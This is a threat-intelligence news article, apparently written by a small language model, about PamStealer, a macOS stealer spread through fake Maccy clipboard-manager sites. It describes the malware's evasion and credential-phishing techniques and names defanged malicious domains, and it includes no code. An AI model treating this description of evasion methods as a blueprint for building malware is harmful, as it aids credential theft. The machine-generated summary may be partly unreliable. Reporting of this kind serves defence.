Today's cybersecurity headlines are brought to you by ThreatPerspective


Ethical Hacking News

PamStealer: A Sophisticated macOS Information Stealer Utilizing Fake Websites and PAM Checks



PamStealer is a highly complex piece of malware designed to steal sensitive information from macOS systems, particularly user login passwords. It employs fake websites impersonating legitimate clipboard managers and leverages the PAM system for password validation.

  • PamStealer is a macOS malware designed to steal user login passwords.
  • The malware infects systems through fake clipboard manager websites and exploits the macOS PAM system for password validation.
  • PamStealer is distributed as an AppleScript file impersonating Maccy, a legitimate open-source clipboard manager.
  • The primary access vector is a lookalike site (maccyapp[.]com) that tricks users into granting full file system access.
  • The malware validates credentials locally through PAM and uses environment-aware features to execute the payload on Apple Silicon systems.
  • PamStealer collects web browser data, cryptocurrency wallet information, iCloud Keychain data, and clipboard content for exfiltration.
  • The malware also serves a native password prompt that validates user input via PAM API.



  • Threat Intelligence News

    PamStealer is a highly sophisticated and complex piece of malware designed to steal sensitive information from macOS systems, particularly user login passwords. The malicious software employs a series of clever tricks to infect systems and siphon crucial data, including exploiting fake websites impersonating legitimate clipboard managers and leveraging the macOS Pluggable Authentication Modules (PAM) system for password validation.

    According to recent reports by Jamf Threat Labs, PamStealer has been codenamed due to its ability to validate a victim's login password through the PAM API before capturing it. The malware is distributed as a compiled AppleScript (.scpt) file impersonating Maccy, a legitimate open-source clipboard manager. This initial dropper is designed to download and stage a follow-on payload, which is a Rust-based infostealer capable of credential theft, browser data collection, persistence, and exfiltration.

    The primary access vector for the malware is a lookalike site ("maccyapp[.]com") that mimics Maccy ("maccy[.]app"). This deceptive approach aims to trick users into granting the malicious software full file system access. Upon launching the script via the Script Editor, it displays instructions to run it using the "⌘ + R" keyboard shortcut or clicking the Run button from the Script Editor, causing the malicious logic hidden in the file below a large block of empty lines to be executed.

    What is notable about this approach is that it works even when the file still carries the com.apple.quarantine attribute, which makes the method attractive to attackers as Apple continues to tighten Gatekeeper and Terminal. Security researcher Thijs Xhaflaire stated that "Combined with a Rust-based second stage and a password capture workflow that validates credentials locally through PAM, the result is a quieter execution chain than we typically observe in commodity macOS stealers."

    The AppleScript dropper incorporates environment-aware features that allow it to continue executing only after fingerprinting the host and determining it's running on Apple Silicon. It achieves this by deriving a key based on the fingerprint, which includes details like the CPU architecture, locale, keyboard layout, and time zone, and then using it to unlock an encrypted configuration containing the payload URL and install path.

    On Intel-based Macs, the derived decryption key differs and fails to decode the configuration, resulting in the termination of the dropper. The script also avoids execution within sandboxed or analysis environments, as well as systems whose time zone, system locale, and keyboard input resolve to countries located in Eastern Europe, such as Russia, Belarus, Kazakhstan, Armenia, Azerbaijan, Kyrgyzstan, Moldova, Tajikistan, Uzbekistan, Turkmenistan, and Georgia.

    Once the checks pass, the script reaches out to an external server and downloads a Mach-O binary written in Rust that masquerades as the Finder app. This executable is responsible for harvesting data from web browsers, cryptocurrency wallet extensions, iCloud Keychain, and clipboard content. The captured information is then encrypted and exfiltrated to attacker-controlled infrastructure ("avenger-sync[.]live") over an outbound HTTP request.

    The malware also serves a native password prompt that collects the victim's system password and validates it via the PAM API. If the validation fails, it asks the user to re-enter the password, repeating the loop until the correct password is supplied. This process is further reinforced by displaying a counterfeit alert stating that Maccy has been damaged and needs to be moved to the Trash, which serves as a decoy to make the victim discard the lure and assume the download was broken.

    According to Alex Rodionov, the developer of Maccy, malicious sites impersonating Maccy have been distributing malware disguised as legitimate software. The official website for Maccy is stated to be the only trusted source, with Rodionov including a warning on their website and GitHub repository stating, "Beware of fake websites impersonating Maccy. Malicious sites (such as maccyapp[.]net and maccyapp[.]com) distribute malware disguised as Maccy."

    The development of PamStealer highlights the evolving nature of macOS stealers, which continue to adapt quieter execution chains and native implementations that reduce traditional detection opportunities while remaining compatible with standard macOS features. The incorporation of environment-aware features, PAM checks, and Rust-based infostealers underscores the sophisticated tactics employed by attackers in order to evade detection and successfully execute their malicious payloads.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/PamStealer-A-Sophisticated-macOS-Information-Stealer-Utilizing-Fake-Websites-and-PAM-Checks-ehn.shtml

  • https://thehackernews.com/2026/07/pamstealer-uses-fake-maccy-sites-and.html


  • Published: Fri Jul 3 04:10:38 2026 by llama3.2 3B Q4_K_M













    © Ethical Hacking News . All rights reserved.

    Privacy | Terms of Use | Contact Us